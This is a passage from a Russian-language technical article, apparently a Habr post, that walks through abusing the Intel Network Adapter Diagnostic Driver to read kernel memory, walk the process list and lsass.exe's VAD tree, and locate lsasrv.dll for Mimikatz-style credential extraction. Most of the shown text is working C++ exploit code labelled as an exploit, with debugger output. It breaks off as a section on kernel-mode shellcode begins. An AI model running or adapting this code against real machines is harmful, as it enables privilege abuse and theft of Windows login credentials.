src=\"\/img\/image-loader.svg\" height=\"22\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/358\/a79\/af1\/358a79af1d589ac70f05ba3b282aa9a6.png\" data-width=\"585\"\/><figcaption><\/figcaption><\/figure>\n<p>VadCount \u2013 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0443\u0437\u043b\u043e\u0432 \u0432 AVL \u0434\u0435\u0440\u0435\u0432\u0435.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"24\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/82e\/9f0\/da6\/82e9f0da658c1574f2e476e3558cfcf0.png\" data-width=\"599\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u0431\u043e\u0440\u0430 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b, \u044f \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b \u043a \u043f\u043e\u0438\u0441\u043a\u0443 \u0434\u0432\u0443\u0445 EPROCESS \u0434\u043b\u044f lsass.exe \u0438 shor.exe. \u0421\u043f\u0435\u0440\u0432\u0430 \u044f \u043d\u0430\u0448\u0435\u043b EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 System.exe. \u0412 \u044d\u0442\u043e\u043c \u043c\u043d\u0435 \u043f\u043e\u043c\u043e\u0433\u043b\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-hardware\/drivers\/kernel\/mm64bitphysicaladdress\">PsInitialSystemProcess<\/a>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 System.exe. \u0417\u0430\u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f ActiveProcessLinks \u0438\u0437 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 System.exe, \u044f \u043f\u0440\u043e\u0448\u0435\u043b \u043f\u043e \u0434\u0432\u0443\u0445\u0441\u0432\u044f\u0437\u043d\u043e\u043c\u0443 \u0441\u043f\u0438\u0441\u043a\u0443 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0438 \u043d\u0430\u0448\u0435\u043b EPROCESS \u0434\u043b\u044f lsass.exe \u0438 shor.exe, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0442\u043e\u043c \u0431\u0443\u0434\u0443\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u044b \u0432 MmCopyVirtualMemory, \u0441 \u0446\u0435\u043b\u044c\u044e \u0434\u0430\u043c\u043f\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\u0437 user-mode. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u044f \u043d\u0430\u0448\u0435\u043b VadRoot \u0438 VadCount, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u0443\u0434\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c.<\/p>\n<p>\u041a\u043e\u0434 \u043f\u043e\u0438\u0441\u043a\u0430 EPROCESS, VadRoot \u0438 VadCount:<\/p>\n<pre><code class=\"cpp\">int main(int argc, char** argv) {  HANDLE   hDevice;  printf(\"--[ Intel Network Adapter Diagnostic Driver exploit ]--\\n\");  printf(\"Opening handle to driver..\\n\"); if ((hDevice = CreateFileA(intel::szDevice, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL)) != INVALID_HANDLE_VALUE) { printf(\"Device %s succesfully opened!\\n\", intel::szDevice); printf(\"\\tHandle: %p\\n\", hDevice); } else { printf(\"Error: Error opening device %s\\n\", intel::szDevice); return 0; }  ULONG64 ReadSystemEPROCESS = PsInitialSystemProcess(); ULONG64 SystemEPROCESS = 0; intel::MemCopy(hDevice, (uint64_t)&amp;SystemEPROCESS, (uint64_t)ReadSystemEPROCESS, 8);   printf(\"[+]PsInitialSystemProcess pointer: 0x%llx\\n\", ReadSystemEPROCESS); printf(\"[+]PsInitialSystemProcess: 0x%llx\\n\", SystemEPROCESS);  ULONG64 ActiveProcessLinksOffset = 0x2f0; ULONG64 ImageFileNameOffset = 0x450; ULONG64 ActiveProcessLinks = SystemEPROCESS+ ActiveProcessLinksOffset; ULONG64 VadRootOffset = 0x658; ULONG64 VadCountOffset = 0x668;  ULONG64 VadRoot_lsass = 0; ULONG64 VadCount_lsass = 0; ULONG64 EPROCESS_lsass = 0; ULONG64 EPROCESS_CurrentProcess = 0; while (true){ ULONG64 ActiveProcessLinksNext = 0; intel::MemCopy(hDevice, (uint64_t)&amp;ActiveProcessLinksNext, (uint64_t)ActiveProcessLinks, 8);  UCHAR ImageFileName[MAX_PATH] = \"\"; intel::MemCopy(hDevice, (uint64_t)&amp;ImageFileName, (uint64_t)(ActiveProcessLinksNext - ActiveProcessLinksOffset + ImageFileNameOffset), MAX_PATH);  if (!strcmp((const char*)ImageFileName, \"lsass.exe\")) { printf(\"[+]Name process: %.*s\\n\", (int)sizeof(ImageFileName), ImageFileName); EPROCESS_lsass = ActiveProcessLinksNext - ActiveProcessLinksOffset; printf(\"[+]EPROCESS lsass: 0x%llx\\n\", EPROCESS_lsass);  intel::MemCopy(hDevice, (uint64_t)&amp;VadRoot_lsass, (uint64_t)(ActiveProcessLinksNext - ActiveProcessLinksOffset + VadRootOffset), 8); intel::MemCopy(hDevice, (uint64_t)&amp;VadCount_lsass, (uint64_t)(ActiveProcessLinksNext - ActiveProcessLinksOffset + VadCountOffset), 8); printf(\"[+]VadRoot: 0x%llx\\n\", VadRoot_lsass); printf(\"[+]VadCount: 0x%llx\\n\", VadCount_lsass);  }  if (!strcmp((const char*)ImageFileName, \"shor.exe\")) { printf(\"[+]Name process: %.*s\\n\", (int)sizeof(ImageFileName), ImageFileName); EPROCESS_CurrentProcess = ActiveProcessLinksNext - ActiveProcessLinksOffset; printf(\"[+]EPROCESS CurrentProcess: 0x%llx\\n\", EPROCESS_CurrentProcess); }  if ((EPROCESS_lsass !=0) &amp;&amp; (EPROCESS_CurrentProcess != 0)) { walkAVL(hDevice, VadRoot_lsass, VadCount_lsass, EPROCESS_lsass, EPROCESS_CurrentProcess); break; } ActiveProcessLinks = ActiveProcessLinksNext; }  getchar(); return 0; } <\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:   <\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"270\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/dde\/342\/895\/dde34289534d3891046b64cdf64a66b0.png\" data-width=\"666\"\/><figcaption><\/figcaption><\/figure>\n<h2>3. \u041f\u043e\u0438\u0441\u043a VAD.<\/h2>\n<p>\u041d\u0430\u0439\u0434\u044f EPROCESS \u0434\u043b\u044f lsass.exe \u043c\u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043e\u0431\u043e\u0439\u0442\u0438 AVL \u0434\u0435\u0440\u0435\u0432\u043e \u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0432\u0441\u0435 VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0430\u0434\u0440\u0435\u0441\u0430 \u043d\u0430 \u043d\u0430\u0447\u0430\u043b\u043e \u0438 \u043a\u043e\u043d\u0435\u0446 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 user-mode, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0443\u0442\u044c \u043a \u0444\u0430\u0439\u043b\u0443. \u0414\u0430\u043d\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f \u043c\u043d\u0435 \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0437 user-mode \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MmCopyVirtualMemory. <\/p>\n<p>\u041f\u0440\u0438\u043c\u0435\u0440 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"253\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/5c8\/0e2\/d55\/5c80e2d5588f7e4b802cbac84fadd3de.png\" data-width=\"1173\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u0438\u0441\u043a VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u0439 \u0434\u043b\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441 \u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0432\u0435\u0440\u0448\u0438\u043d\u044b AVL \u0434\u0435\u0440\u0435\u0432\u0430, \u0437\u0430 \u044d\u0442\u043e \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c VadRoot:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"67\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/b1d\/900\/7a3\/b1d9007a3cecf9c1a7e7f7ddde695955.png\" data-width=\"881\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u0432 VadRoot, \u043c\u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0439\u0442\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 AVL \u0434\u0435\u0440\u0435\u0432\u0443 \u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0438\u0437 \u043d\u0435\u0433\u043e \u0432\u0441\u0435 VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438. \u041e\u043d\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 Left (\u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435 0x00-0x07) \u0438 Right (\u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435 0x08-0x10):<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"200\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/af4\/0ed\/4f6\/af40ed4f6729660148da7007da09ec6f.png\" data-width=\"945\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0431\u044b\u043b\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u044b, \u044f \u043f\u0440\u043e\u0448\u0435\u043b \u043f\u043e \u043d\u0438\u043c \u0438 \u0438\u0437\u0432\u043b\u0435\u043a \u0430\u0434\u0440\u0435\u0441\u0430 \u043d\u0430 \u043d\u0430\u0447\u0430\u043b\u043e (\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u044f 4 \u0431\u0430\u0439\u0442\u0430 \u0438\u0437 0x18 \u0438 1 \u0431\u0430\u0439\u0442 \u0438\u0437 0x20) \u0438 \u043a\u043e\u043d\u0435\u0446 (\u043e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f 4 \u0431\u0430\u0439\u0442\u0430 \u0438\u0437 0x1c \u0438 1 \u0431\u0430\u0439\u0442 \u0438\u0437 0x21) \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 user-mode:<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"220\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/a30\/4db\/cf3\/a304dbcf362d805f5d4aae0a4ed67ef5.png\" data-width=\"418\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041a\u043e\u0434 \u043e\u0431\u0445\u043e\u0434\u0430 AVL \u0434\u0435\u0440\u0435\u0432\u0430: <\/p>\n<pre><code class=\"cpp\">void walkAVL(HANDLE hDevice, ULONG64 VadRoot, ULONG64 VadCount, ULONG64 EPROCESS_lssas, ULONG64 EPROCESS_GetProcess) { ULONG64* queue; ULONG64 count = 0; ULONG64 cursor = 0; ULONG64 last = 1; VAD* vadList = NULL; queue = (ULONGLONG*)malloc(sizeof(ULONGLONG) * VadCount * 4); \/\/ Make room for our queue queue[0] = VadRoot; \/\/ Node 0 vadList = (VAD*)malloc(VadCount * sizeof(*vadList));  ULONG64 size = 0; ULONG64 mask = 0; intel::MemCopy(hDevice, (uint64_t)&amp;mask, (uint64_t)VadRoot, 8); mask = mask &amp; 0xffff000000000000; while (count &lt; VadCount) { ULONG64 currentNode; currentNode = queue[cursor];  if (currentNode == 0) { cursor++; continue; }  ULONG64 VadRootLeft = 0; intel::MemCopy(hDevice, (uint64_t)&amp;VadRootLeft, (uint64_t)currentNode, 8); ULONG64 VadRootRight = 0; intel::MemCopy(hDevice, (uint64_t)&amp;VadRootRight, (uint64_t)(currentNode + 0x8), 8); \/\/printf(\"[+]VadRootLeft: 0x%llx\\n\", VadRootLeft); \/\/printf(\"[+]VadRootRight: 0x%llx\\n\", VadRootRight); queue[last++] = VadRootLeft; queue[last++] = VadRootRight; ULONG64 Start = 0; ULONG64 StartingVpn = 0; ULONG64 StartingVpnHigh = 0; intel::MemCopy(hDevice, (uint64_t)&amp;StartingVpn, (uint64_t)(currentNode + 0x18), 4); intel::MemCopy(hDevice, (uint64_t)&amp;StartingVpnHigh, (uint64_t)(currentNode + 0x20), 1); Start = (StartingVpn &lt;&lt; 12) | (StartingVpnHigh &lt;&lt; 44);  ULONG64 End = 0; ULONG64 EndingVpn = 0; ULONG64 EndingVpnHigh = 0; intel::MemCopy(hDevice, (uint64_t)&amp;EndingVpn, (uint64_t)(currentNode + 0x1c), 4); intel::MemCopy(hDevice, (uint64_t)&amp;EndingVpnHigh, (uint64_t)(currentNode + 0x21), 1); End = ((EndingVpn + 1) &lt;&lt; 12) | (EndingVpnHigh &lt;&lt; 44); printf(\"[+] Vad 0x%llx  |  Start-End: 0x%llx-0x%llx Size byte: %lld\\n\", currentNode, Start, End, (End - Start));  count++; cursor++; } free(vadList); free(queue); return; } <\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:   <\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"448\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/1cc\/919\/98c\/1cc91998caa25070da22f140d2adfe1e.png\" data-width=\"1042\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, VAD \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0435\u0441\u043b\u0438 \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u0437\u0430\u0440\u0435\u0437\u0435\u0440\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0437\u0430 \u0444\u0430\u0439\u043b\u0430, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0443\u0442\u044c \u043a \u044d\u0442\u043e\u043c\u0443 \u0444\u0430\u0439\u043b\u0443. \u042d\u0442\u043e \u0432\u0430\u0436\u043d\u043e, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u044f \u0445\u043e\u0447\u0443 \u043d\u0430\u0439\u0442\u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 lsasrv.dll \u0432\u043d\u0443\u0442\u0440\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u0441\u044e\u0434\u0430 \u0431\u0443\u0434\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u044b \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0438 \u0441 Mimikatz sekurlsa::msv. <\/p>\n<p>\u041f\u043e\u0438\u0441\u043a \u043f\u0443\u0442\u0438 \u043a \u0444\u0430\u0439\u043b\u0443 lsasrv.dll \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u043e\u0439\u0442\u0438 \u043f\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430\u043c \u0432 kernel-mode: <\/p>\n<pre><code>ffff810344b90110  5       7ffa044f0       7ffa04690              13 Mapped  Exe  EXECUTE_WRITECOPY  \\Windows\\System32\\lsasrv.dll  0: kd> dt nt!_mmvad ffff810344b90110    +0x000 Core             : _MMVAD_SHORT    +0x040 u2               : &lt;anonymous-tag>    +0x048 Subsection       : 0xffff8103`42db2d30 _SUBSECTION &lt;===========================    +0x050 FirstPrototypePte : 0xffffa483`fe977010 _MMPTE    +0x058 LastContiguousPte : 0xffffa483`fe977d10 _MMPTE    +0x060 ViewLinks        : _LIST_ENTRY [ 0xffff8103`42db2cb8 - 0xffff8103`42db2cb8 ]    +0x070 VadsProcess      : 0xffff8103`44b71081 _EPROCESS    +0x078 u4               : &lt;anonymous-tag>    +0x080 FileObject       : (null)  0: kd> dt nt!_SUBSECTION  0xffff8103`42db2d30    +0x000 ControlArea      : 0xffff8103`42db2cb0 _CONTROL_AREA &lt;===========================    +0x008 SubsectionBase   : 0xffffa483`fe977010 _MMPTE    +0x010 NextSubsection   : 0xffff8103`42db2d68 _SUBSECTION    +0x018 GlobalPerSessionHead : _RTL_AVL_TREE    +0x018 CreationWaitList : (null)     +0x018 SessionDriverProtos : (null)     +0x020 u                : &lt;anonymous-tag>    +0x024 StartingSector   : 0    +0x028 NumberOfFullSectors : 2    +0x02c PtesInSubsection : 1    +0x030 u1               : &lt;anonymous-tag>    +0x034 UnusedPtes       : 0y000000000000000000000000000000 (0)    +0x034 ExtentQueryNeeded : 0y0    +0x034 DirtyPages       : 0y0  0: kd> dt nt!_CONTROL_AREA  0xffff8103`42db2cb0    +0x000 Segment          : 0xffffa484`02468160 _SEGMENT    +0x008 ListHead         : _LIST_ENTRY [ 0xffff8103`44b90170 - 0xffff8103`44b90170 ]    +0x008 AweContext       : 0xffff8103`44b90170 Void    +0x018 NumberOfSectionReferences : 0    +0x020 NumberOfPfnReferences : 0x19a    +0x028 NumberOfMappedViews : 1    +0x030 NumberOfUserReferences : 1    +0x038 u                : &lt;anonymous-tag>    +0x03c u1               : &lt;anonymous-tag>    +0x040 FilePointer      : _EX_FAST_REF &lt;===========================    +0x048 ControlAreaLock  : 0n0    +0x04c ModifiedWriteCount : 0    +0x050 WaitList         : (null)     +0x058 u2               : &lt;anonymous-tag>    +0x068 FileObjectLock   : _EX_PUSH_LOCK    +0x070 LockedPages      : 1    +0x078 u3               : &lt;anonymous-tag>  0: kd> dt nt!_EX_FAST_REF  0xffff8103`42db2cb0 + 0x40    +0x000 Object           : 0xffff8103`44b7566d Void &lt;=========================== &amp; 0xfffffffffffffff0    +0x000 RefCnt           : 0y1101    +0x000 Value            : 0xffff8103`44b7566d<\/code><\/pre>\n<p>\u0427\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 _FILE_OBJECT \u043c\u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u044e \u0446\u0438\u0444\u0440\u0443 \u0432 0xffff8103`44b756<strong>6d<\/strong> \u043d\u0430 0, \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0432 0xffff8103`44b756<strong>60<\/strong>   <\/p>\n<pre><code>0: kd> dt nt!_FILE_OBJECT  0xffff8103`44b75660    +0x000 Type             : 0n5    +0x002 Size             : 0n216    +0x008 DeviceObject     : 0xffff8103`426d9c00 _DEVICE_OBJECT    +0x010 Vpb              : 0xffff8103`4265c0e0 _VPB    +0x018 FsContext        : 0xffffa484`02484170 Void    +0x020 FsContext2       : 0xffffa484`024843d0 Void    +0x028 SectionObjectPointer : 0xffff8103`42faaf28 _SECTION_OBJECT_POINTERS    +0x030 PrivateCacheMap  : (null)     +0x038 FinalStatus      : 0n0    +0x040 RelatedFileObject : (null)     +0x048 LockOperation    : 0 ''    +0x049 DeletePending    : 0 ''    +0x04a ReadAccess       : 0x1 ''    +0x04b WriteAccess      : 0 ''    +0x04c DeleteAccess     : 0 ''    +0x04d SharedRead       : 0x1 ''    +0x04e SharedWrite      : 0 ''    +0x04f SharedDelete     : 0x1 ''    +0x050 Flags            : 0x44042    +0x058 FileName         : _UNICODE_STRING \"\\Windows\\System32\\lsasrv.dll\" &lt;===========================    +0x068 CurrentByteOffset : _LARGE_INTEGER 0x0    +0x070 Waiters          : 0    +0x074 Busy             : 0    +0x078 LastLock         : (null)     +0x080 Lock             : _KEVENT    +0x098 Event            : _KEVENT    +0x0b0 CompletionContext : (null)     +0x0b8 IrpListLock      : 0    +0x0c0 IrpList          : _LIST_ENTRY [ 0xffff8103`44b75720 - 0xffff8103`44b75720 ]    +0x0d0 FileObjectExtension : (null)<\/code><\/pre>\n<p>\u041a\u043e\u0434 \u043f\u043e\u0438\u0441\u043a\u0430 lsasrv.dll:<\/p>\n<pre><code class=\"cpp\">void walkAVL(HANDLE hDevice, ULONG64 VadRoot, ULONG64 VadCount, ULONG64 EPROCESS_lssas, ULONG64 EPROCESS_GetProcess) { ULONG64* queue; ULONG64 count = 0; ULONG64 cursor = 0; ULONG64 last = 1; VAD* vadList = NULL; queue = (ULONGLONG*)malloc(sizeof(ULONGLONG) * VadCount * 4); queue[0] = VadRoot;  vadList = (VAD*)malloc(VadCount * sizeof(*vadList));  ULONG64 size = 0; ULONG64 mask = 0; intel::MemCopy(hDevice, (uint64_t)&amp;mask, (uint64_t)VadRoot, 8); mask = mask &amp; 0xffff000000000000; while (count &lt; VadCount) { ULONG64 currentNode; currentNode = queue[cursor];  if (currentNode == 0) { cursor++; continue; }   ULONG64 VadRootLeft = 0; intel::MemCopy(hDevice, (uint64_t)&amp;VadRootLeft, (uint64_t)currentNode, 8); ULONG64 VadRootRight = 0; intel::MemCopy(hDevice, (uint64_t)&amp;VadRootRight, (uint64_t)(currentNode + 0x8), 8); \/\/printf(\"[+]VadRootLeft: 0x%llx\\n\", VadRootLeft); \/\/printf(\"[+]VadRootRight: 0x%llx\\n\", VadRootRight); queue[last++] = VadRootLeft; queue[last++] = VadRootRight; ULONG64 Start = 0; ULONG64 StartingVpn = 0; ULONG64 StartingVpnHigh = 0; intel::MemCopy(hDevice, (uint64_t)&amp;StartingVpn, (uint64_t)(currentNode + 0x18), 4); intel::MemCopy(hDevice, (uint64_t)&amp;StartingVpnHigh, (uint64_t)(currentNode + 0x20), 1); Start = (StartingVpn &lt;&lt; 12) | (StartingVpnHigh &lt;&lt; 44);  ULONG64 End = 0; ULONG64 EndingVpn = 0; ULONG64 EndingVpnHigh = 0; intel::MemCopy(hDevice, (uint64_t)&amp;EndingVpn, (uint64_t)(currentNode + 0x1c), 4); intel::MemCopy(hDevice, (uint64_t)&amp;EndingVpnHigh, (uint64_t)(currentNode + 0x21), 1); End = ((EndingVpn + 1) &lt;&lt; 12) | (EndingVpnHigh &lt;&lt; 44);  ULONG64 subsection = 0; intel::MemCopy(hDevice, (uint64_t)&amp;subsection, (uint64_t)(currentNode + 0x48), 8); if (subsection != 0 &amp;&amp; subsection != 0xffffffffffffffff&amp;&amp; (subsection &amp; mask) == mask) {   ULONG64 control_area = 0; intel::MemCopy(hDevice, (uint64_t)&amp;control_area, (uint64_t)(subsection), 8); if (control_area != 0 &amp;&amp; control_area != 0xffffffffffffffff&amp;&amp; (control_area &amp; mask) == mask) {     ULONG64 fileobject = 0; intel::MemCopy(hDevice, (uint64_t)&amp;fileobject, (uint64_t)(control_area + 0x40), 8); if (fileobject != 0 &amp;&amp; fileobject != 0xffffffffffffffff &amp;&amp; (fileobject &amp; mask) == mask) {  fileobject = fileobject &amp; 0xfffffffffffffff0;  USHORT Path_size = 0; intel::MemCopy(hDevice, (uint64_t)&amp;Path_size, (uint64_t)(fileobject + 0x58 + 0x2), 8);  ULONG64 Path = 0; intel::MemCopy(hDevice, (uint64_t)&amp;Path, (uint64_t)(fileobject + 0x58 + 0x8), Path_size);  char FileName[MAX_PATH]; memset(FileName,0, MAX_PATH); intel::MemCopy(hDevice, (uint64_t)&amp;FileName, (uint64_t)(Path), Path_size); char lsasrv[28]; \/\/ = \"Windows\\System32\\lsasrv.dll\"; memset(lsasrv, 0, 28); int lsasrv_size = 0; for (int i = 1; i &lt; (Path_size -1); i++) { if (FileName[i] != 0x00) { lsasrv[lsasrv_size] = FileName[i]; lsasrv_size++; } if (lsasrv_size == 27){ break; } } if (!strcmp((const char*)lsasrv, \"Windows\\\\System32\\\\lsasrv.dll\")) { std::cout &lt;&lt; \"[+]Found: lsasrv.dll \" &lt;&lt; (const char*)lsasrv &lt;&lt; \"\\n\"; printf(\"[+]Start-End: 0x%llx-0x%llx Size byte: %lld\\n\", Start, End, (End - Start)); printf(\"[+]Vad: 0x%llx\\n\", currentNode); break; }  } } }  count++; cursor++; } free(vadList); free(queue); return; } <\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"332\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/787\/e44\/976\/787e449761e59cb8d6f7a239cd25bdf9.png\" data-width=\"722\"\/><figcaption><\/figcaption><\/figure>\n<h2>4. Shellcode \u0432 kernel-mode.<\/h2>\n<p>\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\u0437 user-mode \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u044f \u043d\u0430\u0442\u043a\u043d\u0443\u043b\u0441\u044f \u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0447\u0442\u043e \u043e\u043d \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u0442\u0440\u0435\u0431\u0443\u0435\u043c\u043e\u0433\u043e \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0430. <\/p>\n<p>\u0414\u043b\u044f \u0432\u044b\u0445\u043e\u0434\u0430 \u0438\u0437 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u044f 